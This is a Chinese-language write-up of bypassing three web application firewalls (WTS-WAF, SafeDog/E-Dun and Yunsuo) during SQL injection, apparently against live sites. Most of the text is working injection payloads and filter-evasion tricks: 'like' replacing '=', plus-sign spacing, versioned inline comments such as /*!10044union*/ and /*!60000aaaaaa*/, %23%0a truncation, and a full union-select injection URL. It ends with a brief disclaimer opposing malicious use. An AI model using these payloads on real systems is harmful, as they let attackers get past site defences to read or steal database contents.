实战记一次过狗（WTS、E盾安全狗、云锁）

前言

    经常走夜路，总会遇到狗。体验一下过狗，以后遇到其他种类的狗，至少还能有点思路。

WTS-WAF

网站页面

WAF图标

绕过1=1

用like代替等号成功绕过

神奇的是 and 1空格=空格1居然也可以绕。这个waf的开发真有意思。

order by 不拦截。10个字段

union select绕过

被拦截

尝试加号代替空格，被拦截

在select后面再加个加号，成功绕过union select

database不拦截

单独select不拦截，直接通关。

总结一下

union+select+1,2 绕waf过程可以养成加号代替空格的习惯，可能有意想不到的效果。

E盾（安全狗）

E盾图标

等号绕过

and 加数字被过滤
like绕过。
1 like 1不可以

-1 like -1 可以。同理-1 like 1 屏蔽原内容。

注意1 like -1也被屏蔽了。下图为正常显示画面，厚码。

order by 不拦截。6个字段。

?id=123 and -1 like -1 /*!unIon*/ select 1,2,3,4,5,6-- +

union select拦截

单独union或者select不拦截
union select拦截
/\*\*/内的容纳不执行，/\*！\*/内联注释，里面内容执行
/\*!unIon\*/ /\*!select\*/ 拦截
/\*!unIon\*/ se/*!lect*/不拦截但是不显示内容
/\*!10044unIon select*/ 拦截
/\*!10044unIon\*/ /\*!10044select\*/不拦截，显示内容（版本号绕过，本来是/\*50001!\*/表示数据库版本>=5.00.01时就会执行。现在只有10044还可以用。）
unIon%23QQQQ%0Aselect。%23是注释符#的url编码。%0A是另起一行继续上一条指令。直接上#会被E盾拦截。这里可能因为版本问题，被拦截。

database()绕过

database被拦截
database%23%0a() 截断换行可以

/!10044database()/不可
database/*!10044*/() 不可
database/*!10044()*/可以

from绕过

测试了一下where不拦截
where /.*/ = 就拦截。用like代替等号不拦截
from不拦截。select /.*/ from拦截
fro%23%0am，没报错。但是不能用。完整的sql语句写出来，没有被拦截，但是不显示，也就是说语句出错。%23%0a不管在from的哪个位置都报错。同理我返回尝试database()在字母中插入截断%23%0a都无法正常显示，只有在单词跟括号中间可用。
/*!11440select*/可以绕过，且正常输出

总结一下

·等号绕过用like
·过安全狗最好用的方式：内联注入！这里五位数字有些已经被狗拦截了。可以试试10440 –10449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449这些
·截断法%23%0a不能用在字母中间

云锁

云锁图标

order by绕过，21个字段

内联注入永远的神

union select拦截

单独union，单独select不拦截
union select联合拦截，内联没用。

中间放两个注释/\*\*//\*\*/也没用
union/\*!60000aaaaaa\*/select可以绕过。但是这个叫什么绕过方法不知道。需要注意的，/\*!60000aaaaaa\*/是绕过union select和order by的神器左边数字需要大于50000，后面字母乱填。

database拦截

绕过方法很简单，截断法。%23%0a在括号前截断。

from被拦截

这里首先尝试内联注入from，发现被拦截。

把select也内联注入，不拦截

总结一下

绕过union select和order by神器 /\*60000aaaaaaa\*/。E盾也可以用。
绕过database，截断

写在最后

感兴趣的兄弟，欢迎讨论。
本人坚决反对利用文章内容进行恶意攻击行为，一切错误行为必将受到惩罚，绿色网络需要靠我们共同维护，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。